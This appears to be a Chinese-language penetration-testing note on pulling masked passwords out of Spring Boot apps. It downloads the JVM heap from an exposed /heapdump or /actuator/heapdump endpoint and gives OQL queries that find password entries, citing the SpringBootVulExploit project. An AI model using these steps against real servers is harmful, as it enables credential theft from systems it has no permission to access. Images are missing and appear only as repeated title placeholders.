利用条件:

可正常 GET 请求目标 /heapdump 或 /actuator/heapdump 接口

下载 jvm heap 信息

下载的 heapdump 文件大小通常在 50M—500M 之间,有时候也可能会大于 2G
GET 请求目标的 /heapdump 或 /actuator/heapdump 接口,下载应用实时的 JVM 堆信息

《Spring_Boot获取星号(*)的密码方法(二)》

利用工具

《Spring_Boot获取星号(*)的密码方法(二)》

通过OQL来进行查询

《Spring_Boot获取星号(*)的密码方法(二)》

《Spring_Boot获取星号(*)的密码方法(二)》

OQL标签,在查询

spring_boot 1.x

select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))

spring_boot 2.x

select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))

Other

select * from org.springframework.web.context.support.StandardServletEnvironment

结果:

《Spring_Boot获取星号(*)的密码方法(二)》

 

《Spring_Boot获取星号(*)的密码方法(二)》

 

参考内容:

https://github.com/LandGrey/SpringBootVulExploit

https://landgrey.me/blog/16/